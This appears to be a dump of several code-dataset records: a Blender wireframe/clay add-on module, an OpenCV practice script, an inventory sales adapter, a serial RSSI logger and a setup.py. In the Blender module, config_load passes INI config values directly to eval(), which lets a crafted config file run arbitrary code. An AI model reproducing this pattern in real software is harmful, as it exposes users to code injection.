import w_var\n\n\ndef set_layers_affected():\n \"\"\"Sets all layers who will be affected by wireframing and/or clay material to a list.\n\n Returns:\n A list with booleans representing all the layers that will be affected affected by\n wireframing and/or clay material.\n \"\"\"\n if w_var.cb_only_selected:\n layers_affected = [False, ]*20\n\n for obj in bpy.context.scene.objects:\n if obj.select:\n layers_affected = b_tools.manipulate_layerlists('add', layers_affected, obj.layers)\n\n else:\n layers_affected = list(w_var.original_scene.cwac.layers_affected)\n\n return layers_affected\n\n\ndef set_layers_other(layers_affected):\n \"\"\"Sets all layers who will be included in the render layer just as they are in a list.\n\n Returns:\n A list with booleans representing all the layers that will be included in the render layer just as they are.\n \"\"\"\n layers_other = list(w_var.original_scene.cwac.layers_other)\n\n for index in range(0, 20):\n if layers_other[index] and layers_affected[index]:\n layers_other[index] = False\n\n return layers_other\n\n\ndef set_variables(context):\n \"\"\"Sets variables in w_var with data from the UI, also resets some variables.\n\n Args:\n context: Scene context object.\n \"\"\"\n\n # resetting render layer names\n w_var.rlname = ''\n w_var.rlname_other = ''\n\n # resetting objects selected\n w_var.objects_affected = set()\n w_var.objects_other = set()\n w_var.objects_all_used = set()\n\n # original scene\n w_var.original_scene = context.scene\n\n # from interface:\n # wireframe type\n w_var.wireframe_method = context.scene.cwac.wireframe_method\n\n # checkboxes\n w_var.cb_backup = context.scene.cwac.cb_backup\n w_var.cb_clear_rlayers = context.scene.cwac.cb_clear_rlayers\n w_var.cb_clear_materials = context.scene.cwac.cb_clear_materials\n w_var.cb_composited = context.scene.cwac.cb_composited\n w_var.cb_only_selected = context.scene.cwac.cb_only_selected\n w_var.cb_ao = context.scene.cwac.cb_ao\n w_var.cb_clay = context.scene.cwac.cb_clay\n w_var.cb_clay_only = w_var.cb_clay_only_active and context.scene.cwac.cb_clay_only\n w_var.cb_mat_wire = w_var.cb_mat_wire_active and context.scene.cwac.cb_mat_wire\n w_var.cb_mat_clay = w_var.cb_mat_clay_active and context.scene.cwac.cb_mat_clay\n\n # colors set\n w_var.color_wire = context.scene.cwac.color_wire\n w_var.color_clay = context.scene.cwac.color_clay\n\n # materials set (names)\n w_var.mat_wire_name = context.scene.cwac.material_wire\n w_var.mat_clay_name = context.scene.cwac.material_clay\n\n # sliders\n w_var.slider_wt_freestyle = context.scene.cwac.slider_wt_freestyle\n w_var.slider_wt_modifier = context.scene.cwac.slider_wt_modifier\n\n # layers selected\n layers_affected = set_layers_affected()\n layers_other = set_layers_other(layers_affected)\n w_var.layer_numbers_affected = b_tools.layerlist_to_numberset(layers_affected)\n w_var.layer_numbers_other = b_tools.layerlist_to_numberset(layers_other)\n\n # affected and other layers together, | is logical OR operator\n w_var.layer_numbers_all_used = w_var.layer_numbers_affected | w_var.layer_numbers_other\n\n # scene name set\n w_var.scene_name_1 = context.scene.cwac.scene_name_1\n\n\ndef error_check(context):\n \"\"\"Checks for any possible errors.\n\n Args:\n context: Scene context object.\n \"\"\"\n success = True\n error_msg = \"\"\n\n scene = BlenderSceneW(context.scene, False)\n\n if w_var.cb_only_selected and not scene.check_any_selected('MESH'):\n error_msg += \"- Checkbox 'Only selected' is activated but no mesh is selected!\\n\"\n success = 
False\n\n # used for row alert in __init__.py\n w_var.error_101 = True\n\n if (not w_var.cb_only_selected and\n not len(w_var.layer_numbers_affected) > 0 and not len(w_var.layer_numbers_other) > 0):\n error_msg += \"- No layers selected! Maybe you forgot to use 'Only selected'?\\n\"\n success = False\n\n if w_var.cb_mat_wire and w_var.mat_wire_name == '':\n error_msg += '- No wireframe material selected!\\n'\n success = False\n\n if w_var.cb_mat_clay and w_var.mat_clay_name == '':\n error_msg += '- No clay material selected!\\n'\n success = False\n\n if len(w_var.scene_name_1) == 0:\n error_msg += '- No wireframe/clay scene name!\\n'\n success = False\n\n # used for row alert in __init__.py\n w_var.error_301 = True\n\n return success, error_msg\n\n\ndef config_load(context, filepath):\n \"\"\"Loads an INI config file from filepath.\"\"\"\n\n config = configparser.ConfigParser()\n config.read(filepath)\n\n if 'WIREFRAME TYPE' in config and 'wireframe_method' in config['WIREFRAME TYPE']:\n context.scene.cwac.wireframe_method = config['WIREFRAME TYPE']['wireframe_method']\n\n if 'CHECKBOXES' in config:\n if 'cb_backup' in config['CHECKBOXES']:\n context.scene.cwac.cb_backup = eval(config['CHECKBOXES']['cb_backup'])\n\n if 'cb_clear_rlayers' in config['CHECKBOXES']:\n context.scene.cwac.cb_clear_rlayers = eval(config['CHECKBOXES']['cb_clear_rlayers'])\n\n if 'cb_clear_materials' in config['CHECKBOXES']:\n context.scene.cwac.cb_clear_materials = eval(config['CHECKBOXES']['cb_clear_materials'])\n\n if 'cb_composited' in config['CHECKBOXES']:\n context.scene.cwac.cb_composited = eval(config['CHECKBOXES']['cb_composited'])\n\n if 'cb_only_selected' in config['CHECKBOXES']:\n context.scene.cwac.cb_only_selected = eval(config['CHECKBOXES']['cb_only_selected'])\n\n if 'cb_ao' in config['CHECKBOXES']:\n context.scene.cwac.cb_ao = eval(config['CHECKBOXES']['cb_ao'])\n\n if 'cb_clay' in config['CHECKBOXES']:\n context.scene.cwac.cb_clay = eval(config['CHECKBOXES']['cb_clay'])\n\n if 'cb_clay_only' in config['CHECKBOXES']:\n context.scene.cwac.cb_clay_only = eval(config['CHECKBOXES']['cb_clay_only'])\n\n if 'cb_mat_wire' in config['CHECKBOXES']:\n context.scene.cwac.cb_mat_wire = eval(config['CHECKBOXES']['cb_mat_wire'])\n\n if 'cb_mat_clay' in config['CHECKBOXES']:\n context.scene.cwac.cb_mat_clay = eval(config['CHECKBOXES']['cb_mat_clay'])\n\n if 'COLORS SET' in config:\n if 'color_wireframe' in config['COLORS SET']:\n context.scene.cwac.color_wire = eval(config['COLORS SET']['color_wireframe'])\n\n if 'color_clay' in config['COLORS SET']:\n context.scene.cwac.color_clay = eval(config['COLORS SET']['color_clay'])\n\n if 'MATERIALS SET' in config:\n if 'wireframe' in config['MATERIALS SET']:\n if config['MATERIALS SET']['wireframe'] in bpy.data.materials:\n context.scene.cwac.material_wire = config['MATERIALS SET']['wireframe']\n\n if 'clay' in config['MATERIALS SET']:\n if config['MATERIALS SET']['clay'] in bpy.data.materials:\n context.scene.cwac.material_clay = config['MATERIALS SET']['clay']\n\n if 'SLIDERS' in config:\n if 'slider_wt_freestyle' in config['SLIDERS']:\n context.scene.cwac.slider_wt_freestyle = eval(config['SLIDERS']['slider_wt_freestyle'])\n\n if 'slider_wt_modifier' in config['SLIDERS']:\n context.scene.cwac.slider_wt_modifier = eval(config['SLIDERS']['slider_wt_modifier'])\n\n if 'LAYERS SELECTED' in config:\n if 'layers_affected' in config['LAYERS SELECTED']:\n context.scene.cwac.layers_affected = eval(config['LAYERS SELECTED']['layers_affected'])\n\n if 'layers_other' in 
config['LAYERS SELECTED']:\n context.scene.cwac.layers_other = eval(config['LAYERS SELECTED']['layers_other'])\n\n if 'SCENE NAME SET' in config:\n if 'scene_name_1' in config['SCENE NAME SET']:\n context.scene.cwac.scene_name_1 = config['SCENE NAME SET']['scene_name_1']\n\n\ndef config_save(context, filepath):\n \"\"\"Saves an INI config file to filepath.\"\"\"\n\n config = configparser.ConfigParser()\n\n config['WIREFRAME TYPE'] = {'wireframe_method': context.scene.cwac.wireframe_method}\n\n config['CHECKBOXES'] = {'cb_backup': context.scene.cwac.cb_backup,\n 'cb_clear_rlayers': context.scene.cwac.cb_clear_rlayers,\n 'cb_clear_materials': context.scene.cwac.cb_clear_materials,\n 'cb_composited': context.scene.cwac.cb_composited,\n 'cb_only_selected': context.scene.cwac.cb_only_selected,\n 'cb_ao': context.scene.cwac.cb_ao,\n 'cb_clay': context.scene.cwac.cb_clay,\n 'cb_clay_only': context.scene.cwac.cb_clay_only,\n 'cb_mat_wire': context.scene.cwac.cb_mat_wire,\n 'cb_mat_clay': context.scene.cwac.cb_mat_clay}\n\n config['COLORS SET'] = {'color_wireframe': list(context.scene.cwac.color_wire),\n 'color_clay': list(context.scene.cwac.color_clay)}\n\n config['MATERIALS SET'] = {'wireframe': context.scene.cwac.material_wire,\n 'clay': context.scene.cwac.material_clay}\n\n config['SLIDERS'] = {'slider_wt_freestyle': context.scene.cwac.slider_wt_freestyle,\n 'slider_wt_modifier': context.scene.cwac.slider_wt_modifier}\n\n config['LAYERS SELECTED'] = {'layers_affected': list(context.scene.cwac.layers_affected),\n 'layers_other': list(context.scene.cwac.layers_other)}\n\n config['SCENE NAME SET'] = {'scene_name_1': context.scene.cwac.scene_name_1}\n\n with open(filepath, 'w') as configfile:\n config.write(configfile)\n\n\ndef set_up_wireframe_freestyle():\n \"\"\"Sets up the complete wireframe using the freestyle setup.\"\"\"\n\n # creates wireframe scene\n wire_scene = BlenderSceneW(w_var.original_scene, w_var.cb_backup, w_var.scene_name_1, 'CYCLES')\n\n # sets all used objects to three sets: affected objects, other object and all used objects\n # (need to do after I copy the scene to get the objects from the copied scene)\n wire_scene.add_objects_used()\n\n # updates progress bar to 25 %\n bpy.context.window_manager.progress_update(25)\n\n if not w_var.cb_clay_only:\n\n # sets up renderlayer(s) (depending on 'Composited wireframing' checkbox) and freestyle wireframing\n # also saves freestyle linestyle name\n wire_scene.set_up_rlayer('wireframe', rlname_other='other')\n wire_scene.get_scene().cwac.data_freestyle_linestyle = wire_scene.add_wireframe_freestyle().name\n\n else:\n # sets up renderlayer named 'clay' instead of 'wireframe'\n wire_scene.set_up_rlayer('clay')\n\n # updates progress bar to 50 %\n bpy.context.window_manager.progress_update(50)\n\n if w_var.cb_clear_materials:\n\n # removes all materials from affected meshes\n wire_scene.select('SELECT', {'MESH'}, objects_excluded={'ELSE'})\n wire_scene.clear_materials_on_selected()\n\n # updates progress bar to 75 %\n bpy.context.window_manager.progress_update(75)\n\n if w_var.cb_clay:\n\n # adds clay material to affected meshes and saves material name\n wire_scene.select('SELECT', {'MESH'}, objects_excluded={'ELSE'})\n wire_scene.get_scene().cwac.data_material_clay = wire_scene.add_clay_to_selected().name\n\n # updates progress bar to 99 %\n bpy.context.window_manager.progress_update(99)\n\n if w_var.cb_ao and not w_var.cb_composited:\n\n # sets up ambient occlusion lighting\n wire_scene.comp_add_ao()\n wire_scene.set_up_world_ao()\n\n 
elif w_var.cb_composited:\n\n # sets up composition for wireframe and sets up ambient occlusion lighting if used\n wire_scene.comp_add_wireframe_freestyle()\n bpy.data.scenes[wire_scene.name].cycles.film_transparent = True\n\n if w_var.cb_ao:\n wire_scene.set_up_world_ao()\n\n # deselects all objects as a last thing to clean up\n wire_scene.select('DESELECT', objects={'ALL'})\n\n\ndef set_up_wireframe_modifier():\n \"\"\"Sets up the complete wireframe using the modifier setup.\n\n If the mesh(es) you apply this to have several materials each and you don't use clay, the material of the\n wireframe will not be the expected one as it depends on the material offset set in the wireframe modifier.\n \"\"\"\n\n # creates wireframe scene\n wire_scene = BlenderSceneW(w_var.original_scene, w_var.cb_backup, w_var.scene_name_1, 'CYCLES')\n\n # sets all used objects to three sets: affected objects, other object and all used objects\n # (need to do after I copy the scene to get the objects from the copied scene)\n wire_scene.add_objects_used()\n\n # updates progress bar to 25 %\n bpy.context.window_manager.progress_update(25)\n\n if w_var.cb_clear_materials:\n\n # removes all materials from affected meshes\n wire_scene.select('SELECT', {'MESH'}, objects_excluded={'ELSE'})\n wire_scene.clear_materials_on_selected()\n\n # updates progress bar to 50 %\n bpy.context.window_manager.progress_update(50)\n\n if w_var.cb_clay:\n\n # adds clay material to affected meshes and saves material name\n # (need to add clay material before wireframe material for material offset in wireframe modifier to be correct)\n wire_scene.select('SELECT', {'MESH'}, objects_excluded={'ELSE'})\n wire_scene.get_scene().cwac.data_material_clay = wire_scene.add_clay_to_selected().name\n\n # updates progress bar to 75 %\n bpy.context.window_manager.progress_update(75)\n\n if not w_var.cb_clay_only:\n\n # sets up renderlayer and adds wireframe modifier/material to affected meshes and saves wireframe material\n wire_scene.set_up_rlayer('wireframe')\n wire_scene.get_scene().cwac.data_material_wire = wire_scene.add_wireframe_modifier().name\n\n else:\n\n # sets up renderlayer named 'clay' instead of 'wireframe'\n wire_scene.set_up_rlayer('clay')\n\n # updates progress bar to 99 %\n bpy.context.window_manager.progress_update(99)\n\n if w_var.cb_ao:\n\n # sets up ambient occlusion lighting\n wire_scene.set_up_world_ao()\n wire_scene.comp_add_ao()\n\n # deselects all objects as a last thing to clean up\n wire_scene.select('DESELECT', objects={'ALL'})\n", "sub_path": "scripts/addons_extern/blender-CyclesWireframeAndClay-master/w_tools.py", "file_name": "w_tools.py", "file_ext": "py", "file_size_in_byte": 14484, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bpy.context", "line_number": 20, "usage_type": "attribute"}, {"api_name": "w_b_scene.BlenderSceneW", "line_number": 114, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 149, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 195, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 199, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 224, "usage_type": "call"}, {"api_name": "w_b_scene.BlenderSceneW", "line_number": 261, "usage_type": "call"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 268, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 268, "usage_type": "attribute"}, 
{"api_name": "bpy.context.window_manager.progress_update", "line_number": 282, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 282, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 291, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 291, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 300, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 300, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 312, "usage_type": "attribute"}, {"api_name": "w_b_scene.BlenderSceneW", "line_number": 329, "usage_type": "call"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 336, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 336, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 345, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 345, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 355, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 355, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 369, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 369, "usage_type": "attribute"}]} +{"seq_id": "534983138", "text": "import cv2 as cv\r\nimport numpy as np\r\n\r\nimg = cv.imread(\"C:\\\\Users\\\\tjt\\\\Desktop\\\\1.jpg\")\r\nimg2 = cv.imread(\"C:\\\\Users\\\\tjt\\\\Desktop\\\\2.jpg\")#read the images; OpenCV loads them in BGR order, not RGB\r\nimg_ = img2[0:img.shape[0],0:img.shape[1]] \r\nprint(img.shape) #print the tuple of image height, width and channel count\r\ncv.imshow(\"img\",img)\r\n\r\nsource = cv.split(img) #split the channels, returns a list\r\nprint(type(source))\r\n\r\ng = img[:,:,1] #slice out the whole green channel\r\ncv.imshow(\"g\",g)\r\n\r\nimg_black = np.zeros(img.shape[0:2],dtype = np.uint8) #single-channel image the same size as img, initial pixel values 0\r\nimg_black[100:200,100:200] = 255 #set the pixel values inside this region \r\ncv.imshow(\"img_black\",img_black)\r\n\r\nimg_add = cv.add(img,img_,mask=img_black) #add the pixel values of two same-size images, mask restricts the region\r\ncv.imshow(\"img_add\",img_add)\r\n\r\nimg_blend = cv.addWeighted(img,0.5,img_,0.1,0) #addWeighted(img1,weight1,img2,weight2,constant) computes img1*weight1+img2*weight2+constant\r\ncv.imshow(\"img_blend\",img_blend)\r\n\r\n\r\nimg_and = cv.bitwise_and(img,img_) #bitwise AND\r\nimg_or = cv.bitwise_or(img,img_) #bitwise OR\r\nimg_not = cv.bitwise_not(img) #bitwise NOT\r\ncv.imshow(\"img_and\",img_and)\r\n\r\nlower = np.array([10,20,30])\r\nupper = np.array([200,210,250])\r\nimg_mask = cv.inRange(img,lower,upper) #the two values define a range: pixels in img above the upper or below the lower bound become 0, pixels inside the range become 255\r\ncv.imshow(\"img_mask\",img_mask) #for multi-channel images every channel value must satisfy the condition\r\n\r\nimg_hsv = cv.cvtColor(img,cv.COLOR_BGR2HSV)\r\ncv.imshow(\"img_hsv\",img_hsv)\r\n\r\nkey = cv.waitKey(0)\r\n\r\n\r\n", "sub_path": "opencv_test.py", "file_name": "opencv_test.py", "file_ext": "py", "file_size_in_byte": 1630, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 18,
"usage_type": "call"}, {"api_name": "cv2.add", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.bitwise_or", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "631140203", "text": "import xml.etree.ElementTree as ET\n\ntree = ET.parse('tables')\nroot = tree.getroot()\n\nwith open('tree.html', 'w') as f:\n f.write(\"\")", "sub_path": "queryUI/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 609, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 3, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "461405209", "text": "import pandas as pd\r\nfrom datetime import datetime, timedelta\r\nfrom env.inventory_utils import Utils\r\nimport global_config\r\nimport numpy as np\r\npd.options.mode.chained_assignment = None\r\nclass BaseSaleAdapter(object):\r\n\r\n def __init__(self, config):\r\n self.config = config\r\n self.dt_col = self.config['dt_col']\r\n self.dt_format = self.config['dt_format']\r\n self.sale_col = self.config['sale_col']\r\n self.id_col = self.config['id_col']\r\n self.sale_price_col = self.config['sale_price_col']\r\n self.file_format = self.config.get('file_format', 'CSV')\r\n self.encoding = self.config.get('encoding', 'utf-8')\r\n self.file_loc = self.config['file_loc']\r\n self.sale_mean_col = self.config['sale_mean_col']\r\n self.sale_ts_cache = dict()\r\n self.sale_price_ts_cache = dict()\r\n self.sale_mean = dict()\r\n self.sale_price_mean = dict()\r\n self.date_cache = dict()\r\n\r\n self.total_span = 0\r\n self.cache_data()\r\n\r\n def _transfer_to_daily_sale(self):\r\n pass\r\n\r\n def _transfer_to_original_sale(self):\r\n pass\r\n\r\n def sample_sale_and_price(self, id_val, gap):\r\n # if gap>=225: print(id_val, gap, self.sale_ts_cache[id_val][gap], self.sale_price_ts_cache[id_val][gap])\r\n\r\n # if global_config.random_noise == 'dense':\r\n # demand_noise = 2 * np.random.random() - 1\r\n # demand_noise = 0.2 * demand_noise * self.sale_mean[id_val]\r\n # demand = max(0, int(self.sale_ts_cache[id_val][gap] + demand_noise))\r\n # # print(\"dense noise! 
\", id_val, self.sale_mean[id_val], demand_noise, demand)\r\n # elif global_config.random_noise == 'sparse':\r\n # demand = self.sale_ts_cache[id_val][gap]\r\n # # print(\"sparse noise \")\r\n # if np.random.random() < 0.1:\r\n # demand = np.random.chisquare(2*self.sale_mean[id_val])\r\n # # print(f\"use sparse noise, origin {self.sale_ts_cache[id_val][gap]}, now {demand}, sale mean {self.sale_mean[id_val]}\")\r\n # else:\r\n # # print(\"no noise! \")\r\n # demand = self.sale_ts_cache[id_val][gap]\r\n demand = self.sale_ts_cache[id_val][gap]\r\n return (demand, self.sale_price_ts_cache[id_val][gap])\r\n\r\n def get_date_info(self, id_val, gap):\r\n date = self.date_cache[id_val][gap]\r\n date_info = {\r\n \"isoweekday\": date.isoweekday(),\r\n \"year\": date.year,\r\n \"month\": date.month,\r\n \"day\": date.day,\r\n \"dayofyear\": date.dayofyear,\r\n \"isweekend\": date.isoweekday() >= 6,\r\n }\r\n return date_info\r\n\r\n def get_sale_mean(self, id_val):\r\n return self.sale_mean[id_val]\r\n\r\n def cache_data(self):\r\n self.df = self._read_df()\r\n self._transfer_to_daily_sale()\r\n # id_list = self.df[self.id_col].unique().tolist()\r\n id_list = Utils.get_all_skus()\r\n dt_min, dt_max = self.df[self.dt_col].min(), self.df[self.dt_col].max()\r\n self.total_span = (dt_max - dt_min).days + 1\r\n\r\n for id_val in id_list:\r\n df_tmp = self.df[self.df[self.id_col] == id_val]\r\n df_tmp[f\"{self.dt_col}_str\"] = df_tmp[self.dt_col].map(lambda x: x.strftime(self.dt_format))\r\n sale_cache_tmp = df_tmp.set_index(f\"{self.dt_col}_str\").to_dict('dict')[self.sale_col]\r\n sale_price_cache_tmp = df_tmp.set_index(f\"{self.dt_col}_str\").to_dict('dict')[self.sale_price_col]\r\n date_cache_tmp = df_tmp.set_index(f\"{self.dt_col}_str\").to_dict('dict')[self.dt_col]\r\n dt_tmp = dt_min\r\n self.sale_ts_cache[id_val] = []\r\n self.sale_price_ts_cache[id_val] = []\r\n self.date_cache[id_val] = []\r\n self.sale_mean[id_val] = df_tmp[self.sale_col].mean()\r\n sale_price_mean = df_tmp[self.sale_price_col].mean()\r\n while dt_tmp <= dt_max:\r\n dt_tmp_str = datetime.strftime(dt_tmp, self.dt_format)\r\n if sale_cache_tmp.get(dt_tmp_str) == None:\r\n print(f\"this day is lose in dataset: {dt_tmp_str}\")\r\n #print(f\"press any key to continue ...\")\r\n #input()\r\n self.sale_ts_cache[id_val].append(sale_cache_tmp.get(dt_tmp_str, 0))\r\n self.sale_price_ts_cache[id_val].append(sale_price_cache_tmp.get(dt_tmp_str, sale_price_mean))\r\n self.date_cache[id_val].append(date_cache_tmp.get(dt_tmp_str, dt_tmp))\r\n dt_tmp = dt_tmp + timedelta(days=1)\r\n #if sale_cache_tmp.get(dt_tmp_str) == None:\r\n # print(dt_tmp)\r\n # print(self.date_cache[id_val][-1]p)\r\n\r\n def _read_df(self):\r\n if self.file_format == 'CSV':\r\n self.df = pd.read_csv(self.file_loc, encoding=self.encoding, parse_dates=[self.dt_col])\r\n elif self.file_format == 'EXCEL':\r\n self.df = pd.read_excel(self.file_loc, encoding=self.encoding, parse_dates=[self.dt_col])\r\n else:\r\n raise BaseException('Not Implemented')\r\n return self.df", "sub_path": "RLPolicy/data_adapter/base_sale_adapter.py", "file_name": "base_sale_adapter.py", "file_ext": "py", "file_size_in_byte": 5140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.options", "line_number": 6, "usage_type": "attribute"}, {"api_name": "env.inventory_utils.Utils.get_all_skus", "line_number": 74, "usage_type": "call"}, {"api_name": "env.inventory_utils.Utils", "line_number": 74, "usage_type": "name"}, 
{"api_name": "datetime.datetime.strftime", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 91, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "121287571", "text": "#%%\n# -*- coding: utf-8 -*-\n\n# Offsets:\n# Hallway: 92cm\n# Railing: 192cm\n# Basement: 25cm\n\nimport re\nimport serial\nimport os\nimport csv\nimport time\n\noutput_filepath = r'C:\\Users\\jgamm\\Desktop\\rssi_measurement\\2020-06-23\\data\\basement\\side_blocked'\noutput_filename = r'3.00.csv'\nI_COM = r'COM11'\nR_COM = r'COM12'\nNUM_TRIALS = 50\n\nData = {'time_since_start': [],\n 'time_taken': [],\n 'conn_idx': [],\n 'distance': [],\n 'avg_distance': [],\n 'event': [],\n 'fo_i': [],\n 'fo_r': [],\n 'agc_i': [],\n 'agc_r': [],\n 'dqf': [],\n 'ia_i': [],\n 'ia_r': [],\n 'i_rssi': [],\n 'r_rssi': []}\n\nI = serial.Serial(port=I_COM,\n baudrate=9600,\n parity=serial.PARITY_NONE,\n bytesize=serial.EIGHTBITS,\n stopbits=serial.STOPBITS_ONE)\nR = serial.Serial(port=R_COM,\n baudrate=9600,\n parity=serial.PARITY_NONE,\n bytesize=serial.EIGHTBITS,\n stopbits=serial.STOPBITS_ONE)\n\ntry:\n I.flush()\n R.flush()\n trial = 0\n start_time = time.time()\n while True:\n while I.read() != b'M':\n pass # Wait for beginning of a transmission\n if I.read()+I.read()+I.read()+I.read()+I.read() != b'easur':\n print('Skipping a measurement')\n continue\n i_output = (I.readline()+I.readline()+I.readline())\n i_output = i_output.decode('ascii')\n if 'distance: inf' in i_output: # Skip invalid measurements\n continue\n if not ('dqf: 100' in i_output): # Skip low-quality measurements\n continue\n output = re.findall(r'[-+]?\\d*\\.\\d+|[-+]?\\d+', i_output)\n assert len(output) == 14\n Data['time_since_start'].append(int(1000*(time.time()-start_time)))\n Data['time_taken'].append(int(output[0]))\n Data['conn_idx'].append(int(output[1]))\n Data['distance'].append(float(output[2]))\n Data['avg_distance'].append(float(output[3]))\n Data['event'].append(int(output[4]))\n Data['fo_i'].append(int(output[5]))\n Data['fo_r'].append(int(output[6]))\n Data['agc_i'].append(int(output[7]))\n Data['agc_r'].append(int(output[8]))\n Data['dqf'].append(int(output[9]))\n Data['ia_i'].append(int(output[10]))\n Data['ia_r'].append(int(output[11]))\n Data['i_rssi'].append(int(output[12]))\n Data['r_rssi'].append(int(output[13]))\n trial += 1\n if trial == NUM_TRIALS:\n break\nfinally:\n I.close()\n R.close()\n\nwith open(os.path.join(output_filepath, output_filename), 'w', newline='') as F:\n writer = csv.writer(F, delimiter=',')\n writer.writerow([index for index in Data])\n for trial in range(NUM_TRIALS):\n writer.writerow([Data[index][trial] for index in Data])\n \n ", "sub_path": "data/JimmyGammell/2020-06-23/code/take_data.py", "file_name": "take_data.py", "file_ext": "py", "file_size_in_byte": 2889, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "serial.Serial", "line_number": 37, "usage_type": "call"}, {"api_name": "serial.PARITY_NONE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 40, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 42, "usage_type": "call"}, {"api_name": 
"serial.PARITY_NONE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 52, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 65, "usage_type": "call"}, {"api_name": "time.time", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "286136326", "text": "import os\nfrom setuptools import setup, find_packages\nfrom dual_sessions import __version__\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-dual-sessions',\n version=__version__,\n packages=find_packages(),\n include_package_data=True,\n license='MIT License',\n description='Manage your Django sessions differently for authenticated and unauthenticated users - with minimal configuration '\n 'required.',\n long_description=README,\n url='https://github.com/Aristotle-Metadata-Enterprises/',\n author='Aristotle Cloud Services Australia',\n author_email='hello@aristotlemetadata.com',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n keywords='django sessions management',\n install_requires=[\n 'django', # I mean obviously you'll have django installed if you want to use this.\n ],\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1278, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 9, 